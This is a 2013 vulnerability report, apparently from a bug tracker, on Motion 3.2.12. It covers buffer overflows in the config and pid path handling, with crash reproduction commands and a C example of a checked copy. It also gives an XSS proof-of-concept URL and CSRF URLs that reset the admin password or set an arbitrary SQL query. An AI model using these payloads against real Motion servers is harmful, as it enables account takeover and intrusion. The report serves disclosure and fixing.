BUG: Multiple Vulnerabilities
Motion 3.2.12 is prone to multiple vulnerabilities. These vulnerabilities are Buffer Overflows, Cross Site Scripting and Cross Site Request Forgery.
Buffer Overflows:
Supplying a long filename to the config and pid parameters of the "motion" binary results in a buffer overflow. The cause is the unsafe C function strcpy(), which does no boundary checking to prevent overflowing the buffer.
This in theory could be abused to escalate privileges if the suid/sgid flag is set on the motion binary (not default on most operating systems as far as I know).
The bugs can be replicated as follows:
# motion -c `python -c 'print "\x41"*1000'`
*** buffer overflow detected ***: motion terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x45)[0xb6876045]
/lib/i386-linux-gnu/libc.so.6(+0x102e1a)[0xb6874e1a]
/lib/i386-linux-gnu/libc.so.6(+0x10227f)[0xb687427f]
motion[0x804c0bb]
motion[0x8050e95]
motion[0x804c624]
motion[0x804aff6]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb678b4d3]
motion[0x804b761]
Aborted
# motion -p /tmp/`python -c 'print "\x41"*5000'`
*** buffer overflow detected ***: motion terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x45)[0xb68cf045]
/lib/i386-linux-gnu/libc.so.6(+0x102e1a)[0xb68cde1a]
/lib/i386-linux-gnu/libc.so.6(+0x10214d)[0xb68cd14d]
motion[0x805012b]
motion[0x8050c00]
motion[0x804c624]
motion[0x804aff6]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb67e44d3]
motion[0x804b761]
Aborted
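The unchecked strcpy() pattern described above, next to a length-checked replacement, as an added example that is not Motion's own source. The names `set_path_unsafe`, `set_path_checked`, `try_length` and the buffer size `CONF_PATH_SIZE` are hypothetical.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical size of the fixed buffer that receives the -c / -p path. */
#define CONF_PATH_SIZE 256

/* The pattern the report describes: the copy length is decided by the
 * attacker-controlled argument, not by the destination buffer. */
void set_path_unsafe(char *dst, const char *arg)
{
    strcpy(dst, arg);
}

/* Hardened form: measure the argument against the destination first and
 * refuse it instead of truncating, so a path is never silently changed.
 * Returns 0 on success, -1 with errno set on failure. */
int set_path_checked(char *dst, size_t dst_size, const char *arg)
{
    size_t len = 0;

    if (dst == NULL || arg == NULL || dst_size == 0) {
        errno = EINVAL;
        return -1;
    }
    /* Never look further into arg than the destination could hold. */
    while (len < dst_size && arg[len] != '\0')
        len++;
    if (len == dst_size) {          /* no room left for the terminator */
        dst[0] = '\0';
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(dst, arg, len + 1);      /* includes the terminating NUL */
    return 0;
}

/* Builds a constructed argument of n 'A' bytes (the shape used in the
 * report) and feeds it to the checked copy. Returns 0 if accepted and
 * copied intact, -1 if rejected, a lower value on an internal error. */
int try_length(size_t n)
{
    char dst[CONF_PATH_SIZE];
    char *arg = malloc(n + 1);
    int rc;

    if (arg == NULL)
        return -2;
    memset(arg, 'A', n);
    arg[n] = '\0';
    rc = set_path_checked(dst, sizeof dst, arg);
    if (rc == 0 && strcmp(dst, arg) != 0)
        rc = -3;
    free(arg);
    return rc;
}

int main(void)
{
    size_t lengths[] = { 10, CONF_PATH_SIZE - 1, CONF_PATH_SIZE, 1000, 5000 };

    for (size_t i = 0; i < sizeof lengths / sizeof lengths[0]; i++)
        printf("%zu-byte argument: %s\n", lengths[i],
               try_length(lengths[i]) == 0 ? "accepted" : "rejected");
    return 0;
}
```

The "buffer overflow detected" abort in the output above comes from glibc's fortified strcpy (`__fortify_fail` in the backtrace), which stops the process but does not replace a length check in the program itself.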
Cross Site Scripting vulnerability:
It's possible to execute script code on the client-side browser through the "process_id_file" parameter.
The following Proof of Concept url will display a popup with the text XSS:
http://<IP>:<PORT>/0/config/set?process_id_file=</li><script>alert('XSS');</script><li>
Solution: Sanitise user input values
Cross Site Request Forgery:
The following URLs show that it's possible to reset a password or change the SQL query by sending a complete URL to the victim. If the victim clicks on the URL, the command is executed without any further checking.
http://<IP>:<PORT>/0/config/set?control_authentication=admin:mypassword (Set admin password)
http://<IP>:<PORT>/0/config/set?sql_query=SELECT%20user() (Arbitrary SQL query)
See the following URL for more information on CSRF and solutions: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Environment
Motion version: 3.2.12
ffmpeg version:
Shared libraries: ffmpeg
Server OS: Ubuntu 12.04
--
RvH - 07 Mar 2013
Follow up
A fix for this is currently being pursued.
Fix record